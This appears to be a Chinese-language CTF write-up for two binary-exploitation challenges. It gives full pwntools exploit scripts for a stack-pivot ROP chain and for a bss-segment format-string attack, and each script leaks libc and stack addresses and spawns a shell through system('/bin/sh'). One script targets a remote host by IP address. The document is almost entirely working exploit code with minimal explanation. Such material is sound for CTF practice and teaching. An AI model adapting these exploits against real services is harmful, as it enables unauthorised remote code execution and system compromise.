shanxi
溢出的字节数不够,利用栈迁移获得足够空间构造rop链
exp如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| from pwn import *
context(log_level='debug')
elf=ELF('./pwn')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
p=remote("60.204.130.55",10001)
p.recvuntil(b'choice :\n')
payload=str(2).encode('utf-8')
p.sendline(payload)
p.recv()
p.sendline(b'%37$p%10$p%19$p')
p.recvuntil(b'0x')
libc_start_main=int(p.recv(12),16)-128
print(hex(libc_start_main))
p.recvuntil(b'0x')
stack_addr=int(p.recv(12),16)-0x30
print(hex(stack_addr))
p.recvuntil(b'0x')
main_addr=int(p.recv(12),16)
print(hex(main_addr))
code_base = main_addr - 0x12eb
offset=libc.symbols['__libc_start_main']
libcbase=libc_start_main-offset
print(hex(libcbase))
sys = libcbase + libc.symbols['system']
binsh = libcbase + next(libc.search(b'/bin/sh'))
pop_rdi_ret=0x1433 + code_base
leave_ret = 0x127f + code_base
ret = 0x101a + code_base
p.recvuntil(b'choice :\n')
p.sendline(str(1).encode('utf-8'))
payload=p64(pop_rdi_ret)+p64(binsh)+p64(sys)+b'a'*8
payload += p64(stack_addr-0x28) + p64(leave_ret)
p.recvuntil(b'Mountain\n')
p.send(payload)
p.interactive()
|
ez_printf
考察了在bss段的格式化字符串,原理不复杂,就是有点麻烦
exp如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
| from pwn import *
context(log_level='debug')
p=process('./pwn')
elf=ELF('./pwn')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
p.recv()
p.send(b'TokameinE_is_the_best_pwner\x00')
p.recv()
p.sendline(b'%11$p.%49$p.%8$p.')
p.recvuntil(b'0x')
base=int(p.recvuntil(b'.',drop=True),16)-134-0x1595
print("base:"+hex(base))
p.recvuntil(b'0x')
offset=libc.symbols['__libc_start_main']
print(hex(offset))
true=int(p.recvuntil(b'.',drop=True),16)-128
print(hex(true))
libcbase=true-offset
print("libcbase:"+hex(libcbase))
p.recvuntil(b'0x')
stack_addr=int(p.recvuntil(b'.',drop=True),16)
print("stack_addr:"+hex(stack_addr))
bin_sh=next(libc.search(b'/bin/sh'))+libcbase
print("bin_sh:"+hex(bin_sh))
sys_addr=libc.symbols['system']+libcbase
print("sys_addr:"+hex(sys_addr))
pop_rdi_ret=base+0x16c3
print("pop_rdi_ret:"+hex(pop_rdi_ret))
ret=base+0x101a
print("base:"+hex(ret))
stack_1=stack_addr+0x10
stack_2=stack_addr-0x8
stack_3=stack_addr+0x8
p.recvuntil(b'say?\n')
print(hex(stack_1&0xffff))
print(hex(stack_addr&0xffff))
if (stack_1&0xffff)>=(stack_addr&0xffff):
payload=b'%'+str(stack_addr&0xffff).encode('utf-8')+b'c%51$hn'
payload+=b'%'+str((stack_1&0xffff)-(stack_addr&0xffff)).encode('utf-8')+b'c%33$hn'
else:
payload=b'%'+str(stack_1&0xffff).encode('utf-8')+b'c%33$hn'
payload+=b'%'+str((stack_addr&0xffff)-(stack_1&0xffff)).encode('utf-8')+b'c%51$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
print(hex(sys_addr&0xffff))
print(hex(bin_sh&0xffff))
if (sys_addr&0xffff)>=(bin_sh&0xffff):
payload=b'%'+str(bin_sh&0xffff).encode('utf-8')+b'c%65$hn'
payload+=b'%'+str((sys_addr&0xffff)-(bin_sh&0xffff)).encode('utf-8')+b'c%63$hn'
else:
payload=b'%'+str(sys_addr&0xffff).encode('utf-8')+b'c%63$hn'
payload+=b'%'+str((bin_sh&0xffff)-(sys_addr&0xffff)).encode('utf-8')+b'c%65$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
print(hex((stack_1+2)&0xffff))
print(hex((stack_addr+2)&0xffff))
if ((stack_1+2)&0xffff)>=((stack_addr+2)&0xffff):
payload=b'%'+str((stack_addr+2)&0xffff).encode('utf-8')+b'c%51$hn'
payload+=b'%'+str(((stack_1+2)&0xffff)-((stack_addr+2)&0xffff)).encode('utf-8')+b'c%33$hn'
else:
payload=b'%'+str((stack_1+2)&0xffff).encode('utf-8')+b'c%33$hn'
payload+=b'%'+str(((stack_addr+2)&0xffff)-((stack_1+2)&0xffff)).encode('utf-8')+b'c%51$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
print(hex((sys_addr>>16)&0xffff))
print(hex((bin_sh>>16)&0xffff))
if ((sys_addr>>16)&0xffff)>=((bin_sh>>16)&0xffff):
payload=b'%'+str((bin_sh>>16)&0xffff).encode('utf-8')+b'c%65$hn'
payload+=b'%'+str(((sys_addr>>16)&0xffff)-((bin_sh>>16)&0xffff)).encode('utf-8')+b'c%63$hn'
else:
payload=b'%'+str((sys_addr>>16)&0xffff).encode('utf-8')+b'c%63$hn'
payload+=b'%'+str(((bin_sh>>16)&0xffff)-((sys_addr>>16)&0xffff)).encode('utf-8')+b'c%65$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
print(hex((stack_1+4)&0xffff))
print(hex((stack_addr+4)&0xffff))
if ((stack_1+4)&0xffff)>=((stack_addr+4)&0xffff):
payload=b'%'+str((stack_addr+4)&0xffff).encode('utf-8')+b'c%51$hn'
payload+=b'%'+str(((stack_1+4)&0xffff)-((stack_addr+4)&0xffff)).encode('utf-8')+b'c%33$hn'
else:
payload=b'%'+str((stack_1+4)&0xffff).encode('utf-8')+b'c%33$hn'
payload+=b'%'+str(((stack_addr+4)&0xffff)-((stack_1+4)&0xffff)).encode('utf-8')+b'c%51$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
print(hex((sys_addr>>32)&0xffff))
print(hex((bin_sh>>32)&0xffff))
payload=b'%'+str((bin_sh>>32)&0xffff).encode('utf-8')+b'c%65$hn'+b'%63$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
payload=b'%'+str(stack_2&0xffff).encode('utf-8')+b'c%33$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
payload=b'%'+str(pop_rdi_ret&0xffff).encode('utf-8')+b'c%63$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
payload=b'%'+str(stack_3&0xffff).encode('utf-8')+b'c%33$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
payload=b'%'+str(ret&0xffff).encode('utf-8')+b'c%63$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
payload=b'%'+str(stack_3&0xffff).encode('utf-8')+b'c%33$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
payload=b'%'+str(ret&0xffff).encode('utf-8')+b'c%63$hn'
p.sendline(payload)
p.recv()
p.interactive()
|
_%E3%83%9C%E3%82%AB%E3%83%AD%E3%82%B9%E3%83%9A%E3%82%B7%E3%83%A3%E3%83%AB7_108386230_p0.jpg)
